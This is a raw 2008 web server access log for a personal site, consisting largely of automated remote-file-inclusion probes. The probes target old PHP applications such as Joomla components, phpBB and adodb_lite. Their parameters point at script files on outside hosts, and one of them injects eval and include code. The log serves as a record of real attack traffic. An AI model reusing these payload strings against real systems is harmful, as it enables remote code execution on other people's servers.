217.171.66.245 - - [28/Aug/2008:09:24:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:16 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:09:24:16 -0700] "GET /logs/access_080325.log//codebb/lang_select?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:17 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:09:24:17 -0700] "GET //codebb/lang_select?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:19 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:19 -0700] "GET /errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:24:26 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85271 "-" "libwww-perl/5.79" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:31 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [28/Aug/2008:09:24:35 -0700] "GET /logs/access_080531.log/modules/My_eGallery/public/displayCategory.php?basepath=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:49 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:49 -0700] "GET /logs/access_080723.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:49 -0700] "GET /view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:49 -0700] "GET /logs/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:50 -0700] "GET /logs/access_080725.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:24:51 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:56 -0700] "GET /logs/access_080723.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:56 -0700] "GET /view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:57 -0700] "GET /logs/access_080725.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [28/Aug/2008:09:24:57 -0700] "GET /logs/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.26.80.186 - - [28/Aug/2008:09:25:14 -0700] "GET /logs//xfection/http://deadrbt.free2hoxt.com/b0tz/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
189.26.80.186 - - [28/Aug/2008:09:25:14 -0700] "GET //xfection/http://deadrbt.free2hoxt.com/b0tz/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:09:25:17 -0700] "GET /logs/access_080716.log//codebb/lang_select?phpbb_root_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:25:22 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:25:22 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:25:22 -0700] "GET /phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:25:22 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:25:28 -0700] "GET /phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:25:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-091_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:25:58 -0700] "GET /logs/access_080401.log//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:25:58 -0700] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:25:59 -0700] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 85419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:00 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:03 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:04 -0700] "GET /errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:04 -0700] "GET /logs/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [28/Aug/2008:09:26:27 -0700] "GET /logs/access_080531.log/modules/My_eGallery/public/displayCategory.php?basepath=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:26:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-156_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:41 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:53 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:26:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:27:02 -0700] "GET /logs/access_080723.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:27:02 -0700] "GET /view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:27:02 -0700] "GET /logs/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:27:03 -0700] "GET /logs/access_080725.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:27:04 -0700] "GET /logs/access_080223.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:27:05 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 62571 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:09:27:05 -0700] "GET /test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:27:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:27:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:27:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0084.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:27:15 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 85175 "-" "libwww-perl/5.805" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:09:27:21 -0700] "GET /logs/access_080111.log//vwar/convert/mvcw.php?step=1&vwar_root=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:09:27:21 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:09:27:22 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:09:27:23 -0700] "GET /test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:27:29 -0700] "GET /page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [28/Aug/2008:09:27:32 -0700] "GET /?ADMIN_FOLDER=http://clan.gotr00t.net/temp//style.css?? HTTP/1.1" 200 85111 "-" "libwww-perl/5.812" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:27:35 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0137_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:27:37 -0700] "GET /test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.20.219.114 - - [28/Aug/2008:09:27:58 -0700] "GET /logs/access_071027.log HTTP/1.0" 200 191919 "http://hk.search.yahoo.com/search?p=%22what+is%22&meta=rst=hk&fl=0&rst=hk&pstart=1&b=1&ei=BIG5&n=10" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; (R1 1.3))" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:28:04 -0700] "GET /logs/access_080723.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:28:04 -0700] "GET /view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:28:04 -0700] "GET /logs/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:28:07 -0700] "GET /logs/access_080725.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:28:10 -0700] "GET /logs/access_080725.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:28:10 -0700] "GET /logs/access_080723.log/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:28:10 -0700] "GET /view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.155.138 - - [28/Aug/2008:09:28:10 -0700] "GET /logs/view_video.php?viewkey=http://locoputo1234.100webspace.net/bots/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:28:12 -0700] "GET /logs/access_080518.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:28:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 62576 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:28:50 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 85159 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:29:15 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.24.65.146 - - [28/Aug/2008:09:29:38 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ibuysss.info/CVS/cvs???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.24.65.146 - - [28/Aug/2008:09:29:38 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ibuysss.info/CVS/cvs???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.24.65.146 - - [28/Aug/2008:09:29:38 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ibuysss.info/CVS/cvs???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.24.65.146 - - [28/Aug/2008:09:29:39 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ibuysss.info/CVS/cvs???? HTTP/1.1" 200 85283 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:09:29:56 -0700] "GET /logs/access_080211.log/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:09:29:56 -0700] "GET /test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:09:29:57 -0700] "GET /logs/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:09:29:57 -0700] "GET /logs/access_080228.log/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.118.14.195 - - [28/Aug/2008:09:29:59 -0700] "GET /logs/access_070811.log HTTP/1.1" 200 94297 "http://hk.search.yahoo.com/search?p=%22what+is%22&meta=rst=hk&fl=0&rst=hk&pstart=1&b=1&ei=BIG5&n=10" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; Alexa Toolbar)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:30:02 -0700] "GET /errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:09:30:08 -0700] "GET /logs/access_080211.log/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:09:30:08 -0700] "GET /test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:09:30:08 -0700] "GET /logs/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:09:30:08 -0700] "GET /logs/access_080228.log/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:30:25 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST[option]=option,com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:30:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:30:26 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:30:30 -0700] "GET /logs/access_080731.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:30:30 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:30:30 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:30:37 -0700] "GET /logs/access_080806.log/e404.php?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:30:37 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:30:37 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:30:46 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:30:47 -0700] "GET /logs/access_080806.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:30:54 -0700] "GET /logs/access_080211.log/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:30:54 -0700] "GET /test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:30:54 -0700] "GET /logs/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:09:30:54 -0700] "GET /logs/access_080228.log/test.php?page=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.73.137.93 - - [28/Aug/2008:09:31:09 -0700] "GET /logs/access_080606.log/modules/My_eGallery/public/displayCategory.php?basepath=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:31:20 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_27/?S=A HTTP/1.0" 200 1617 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:31:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-028_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
65.254.61.170 - - [28/Aug/2008:09:31:37 -0700] "GET /logs/access_080611.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://clan.gotr00t.net/temp//style.css?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:09:31:37 -0700] "GET /logs/index.php?id=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:09:31:38 -0700] "GET /index.php?id=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 85215 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:09:31:38 -0700] "GET /logs/access_080218.log/index.php?id=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:09:31:48 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:09:31:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:31:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-018_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:31:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015_3.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:32:02 -0700] "GET /logs/access_080531.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:32:02 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
